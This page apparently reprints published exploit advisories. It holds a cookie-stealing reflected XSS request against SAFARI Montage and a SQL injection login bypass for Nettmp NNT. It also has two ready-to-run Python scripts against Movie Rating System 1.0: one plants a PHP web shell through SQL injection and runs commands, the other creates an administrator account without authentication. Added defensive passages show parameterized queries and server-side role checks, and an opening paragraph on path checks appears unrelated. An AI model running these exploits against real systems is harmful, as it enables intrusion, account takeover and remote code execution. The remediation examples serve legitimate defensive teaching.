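Rejecting dot segments before the realpath check is deliberate: a file manager never needs "media/../media/x", and refusing it early keeps the error message pointing at the request value rather than at a resolved path. The realpath/commonpath step still matters, because a symlink dropped into the media directory would otherwise let a name that looks clean resolve outside the web root.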
<pre><code># Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)<br /># Date: 28/12/2021<br /># Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)<br /># Vendor Homepage: https://www.safarimontage.com/<br /># Version: 8.3 and 8.5<br /># Tested on: Ubuntu Linux [Firefox]<br /># CVE: CVE-2021-45425<br /><br /># Proof of Concept:<br /><br />GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1<br />Host: vulnIP<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=SSSION; lang=en<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass<br /># Date: 23/12/2021<br /># Exploit Author: Momen Eldawakhly (Cyber Guy)<br /># Vendor Homepage: https://wiki.nettemp.tk<br /># Software Link: https://wiki.nettemp.tk<br /># Version: nettmp NNT<br /># Tested on: Linux (Ubuntu 20.04)<br /><br />Payload:<br /><br />username: 1' or 1=1;--<br />password: \<br /><br />Proof of Concept:<br /><br />POST /index.php?id=status HTTP/1.1<br />Host: vuln.com<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 55<br />Origin: http://vuln.com<br />DNT: 1<br />Connection: close<br />Referer: http://vulnIP/index.php?id=status<br />Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq<br />Upgrade-Insecure-Requests: 1<br /><br />username=1%27+or+1%3D1%3B--&password=%5C&form_login=log<br /><br /></code></pre>
<pre><code># Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)<br /># Date: 22/12/2021<br /># Exploit Author: Tagoletta (Tağmaç)<br /># Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Ubuntu<br /># This exploit only works correctly if the database user is an administrator. If it is not, continue with SQL injection payloads.<br /><br />import requests<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />url = input("TARGET = ")<br /><br />if not url.startswith('http://') and not url.startswith('https://'):<br />    url = "http://" + url<br />if not url.endswith('/'):<br />    url = url + "/"<br /><br />payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"<br /><br />let = string.ascii_lowercase<br />shellname = ''.join(random.choice(let) for i in range(15))<br /><br />resp = requests.get(url)<br />htmlParser = BeautifulSoup(resp.text, 'html.parser')<br /><br />getMenu = htmlParser.findAll("a", {"class": "nav-link"})<br />selectPage = ""<br />for i in getMenu:<br />    if "movie" in i.text.lower():<br />        selectPage = i["href"]<br />        break<br /><br />selectPage = selectPage.replace("./","")<br />findSql = url + selectPage<br />resp = requests.get(findSql)<br />htmlParser = BeautifulSoup(resp.text, 'html.parser')<br />movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"})<br /><br />sqlPage = movieList[0]["href"]<br />sqlPage = sqlPage.replace("./","")<br /><br />sqlPage = url + sqlPage<br /><br />print("\nFinding path")<br /><br />findPath = requests.get(sqlPage + '\'')<br />findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]<br />findPath = findPath[findPath.index("<b>")+3:len(findPath)]<br />print("injection page: "+sqlPage)<br /><br />parser = findPath.split('\\')<br />parser.pop()<br />findPath = ""<br />for find in parser:<br />    findPath += find + "/"<br /><br />print("\nFound Path : " + findPath)<br /><br />SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"<br />SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")<br />SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())<br /><br />print("\n\nShell Uploading...")<br />status = requests.get(sqlPage+SQLtoRCE)<br /><br />shellOutput = requests.get(url+shellname+".php?tago=whoami")<br />print("\n\nShell Output : "+shellOutput.text)<br />print("\nShell Path : " + url+shellname+".php")<br /></code></pre>
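Both the Nettmp login bypass and the Movie Rating System id injection above come from the same defect: user input is concatenated into the SQL text, so the quote the client supplies ends the literal and the remainder becomes syntax. The following is an added example (not code from either project) that runs each advisory's payload against a string-built query and against its parameterized form in an in-memory SQLite database. The table layout and function names are assumptions for the demonstration; the MySQL-only `INTO OUTFILE` stage of the second advisory is covered in the note after the code.

```python
"""String-built SQL beside its parameterized form, exercised with the
payloads from the two advisories above (the Nettmp login bypass and the
Movie Rating System id injection).

Added example, not code from either project. It runs against an in-memory
SQLite database with constructed rows; table layout and function names are
assumptions for the demonstration.
"""
import sqlite3

# Payloads as they appear in the advisories above.
NETTMP_USER = "1' or 1=1;--"
NETTMP_PASS = "\\"
MOVIE_ID_PAYLOAD = "-1881' OR 1881=1881 LIMIT 0,1 -- -"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account and two movies."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'correct horse');
        CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO movies (title) VALUES ('Alien'), ('Heat');
        """
    )
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Concatenates the inputs into the statement, so the client decides
    where the quoted string ends and what follows it."""
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return con.execute(sql).fetchone() is not None


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Binds the inputs as parameters: they are compared as values and can
    never become part of the SQL grammar."""
    row = con.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def movie_title_vulnerable(con: sqlite3.Connection, movie_id: str):
    """The lookup pattern the Movie Rating System advisory injects into."""
    sql = "SELECT title FROM movies WHERE id = '%s'" % movie_id
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def movie_title_safe(con: sqlite3.Connection, movie_id):
    """Same lookup with a bound parameter; a non-numeric id simply matches
    nothing."""
    row = con.execute("SELECT title FROM movies WHERE id = ?", (movie_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("login, concatenated:", login_vulnerable(db, NETTMP_USER, NETTMP_PASS))
    print("login, parameterized:", login_safe(db, NETTMP_USER, NETTMP_PASS))
    print("movie, concatenated:", movie_title_vulnerable(db, MOVIE_ID_PAYLOAD))
    print("movie, parameterized:", movie_title_safe(db, MOVIE_ID_PAYLOAD))
```

Parameterization removes the injection itself. The write-to-disk stage of the Movie Rating System exploit additionally depends on the application's MySQL account holding the `FILE` privilege and on `secure_file_priv` permitting writes into the web root; a least-privilege database account without `FILE`, and `secure_file_priv` set to a directory outside the document root (or to NULL), take that stage away even where an injection remains.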
<pre><code># Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)<br /># Date: 22/12/2021<br /># Exploit Author: Tagoletta (Tağmaç)<br /># Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: Windows<br /><br />import requests<br />import json<br /><br />url = input('Url:')<br />if not url.startswith('http://') and not url.startswith('https://'):<br />    url = "http://" + url<br />if not url.endswith('/'):<br />    url = url + "/"<br /><br />Username = "tago"<br />Password = "tagoletta"<br /><br />reqUrl = url + "classes/Users.php?f=save"<br /><br />reqHeaders = {<br />    "Accept": "*/*",<br />    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac",<br />    "X-Requested-With": "XMLHttpRequest",<br />    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",<br />    "Origin": url}<br /><br />reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n"<br /><br />resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)<br /><br />if resp.status_code == 200:<br />    print("Admin account created")<br />    reqUrl = url + "classes/Login.php?f=login"<br /><br />    reqHeaders = {<br />        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",<br />        "X-Requested-With": "XMLHttpRequest",<br />        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",<br />        "Origin": url<br />    }<br /><br />    reqData = {"username": ""+Username+"", "password": ""+Password+""}<br /><br />    resp = requests.post(reqUrl, headers=reqHeaders, data=reqData)<br /><br />    data = json.loads(resp.text)<br />    status = data["status"]<br /><br />    if status == "success":<br />        print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password)<br />    else:<br />        print("Exploited but not loginned")<br />else:<br />    print("Not injectable")<br /></code></pre>
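The request above succeeds because the `save` endpoint neither checks who is calling it nor restricts who may set the `type` field that makes the new account an administrator. The following is an added example (not Movie Rating System code) that models such a handler with the same form fields the PoC posts and shows the two server-side decisions whose absence the PoC relies on: an admin-only management path that authenticates, authorizes and then validates the role, and a public self-registration path that ignores a client-supplied role entirely. The session layout, role values, in-memory store and handler names are assumptions for the demonstration.

```python
"""Server-side authorization for an account-creation endpoint.

Added example, not Movie Rating System code. It models a `save` handler
that receives the form fields the PoC above posts (username, password and
type=1) and shows the two decisions whose absence the PoC relies on:
whether the caller may use the endpoint at all, and who may set the role
field. Session layout, role values, the store and the handler names are
assumptions for the demonstration.
"""
import hashlib
import hmac
import os

ADMIN = 1      # matches the type=1 value sent by the PoC
REGULAR = 2    # assumed value for an ordinary account

# The fields the PoC posts, constructed here as a plain dict.
POC_FORM = {"username": "tago", "password": "tagoletta", "type": "1"}


def hash_password(password: str, salt: bytes = None) -> str:
    """PBKDF2-HMAC-SHA256 with a random salt, stored as salt$digest (hex)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(digest.hex(), digest_hex)


def save_user_vulnerable(store: dict, session: dict, form: dict) -> dict:
    """The flaw as described: no caller check, and every field, including
    the role, is copied straight from the request."""
    store[form["username"]] = {
        "password": form["password"],
        "type": int(form.get("type", REGULAR)),
    }
    return {"status": "success"}


def save_user_safe(store: dict, session: dict, form: dict) -> dict:
    """Admin-only user management: authenticate, authorize, then validate."""
    caller = session.get("user")
    if caller is None:
        return {"status": "error", "reason": "authentication required"}
    if caller.get("type") != ADMIN:
        return {"status": "error", "reason": "admin role required"}
    username = form.get("username", "").strip()
    if not username or username in store:
        return {"status": "error", "reason": "invalid or duplicate username"}
    try:
        role = int(form.get("type", REGULAR))
    except ValueError:
        return {"status": "error", "reason": "invalid role"}
    if role not in (ADMIN, REGULAR):
        return {"status": "error", "reason": "invalid role"}
    store[username] = {"password": hash_password(form["password"]), "type": role}
    return {"status": "success"}


def register_user_safe(store: dict, form: dict) -> dict:
    """Public self-registration: no session needed, but the role is fixed
    server-side, so a client-supplied type=1 has no effect."""
    username = form.get("username", "").strip()
    if not username or username in store:
        return {"status": "error", "reason": "invalid or duplicate username"}
    store[username] = {"password": hash_password(form["password"]), "type": REGULAR}
    return {"status": "success"}


if __name__ == "__main__":
    users = {}
    print("unauthenticated save:", save_user_safe(users, {}, POC_FORM))
    print("self-registration:", register_user_safe(users, POC_FORM), users["tago"]["type"])
```

Keeping the two safe paths separate is the point: the endpoint that can assign roles is reachable only by an authenticated administrator, while the endpoint that is reachable by anyone cannot assign roles, so there is no request an anonymous client can send that yields a `type=1` account.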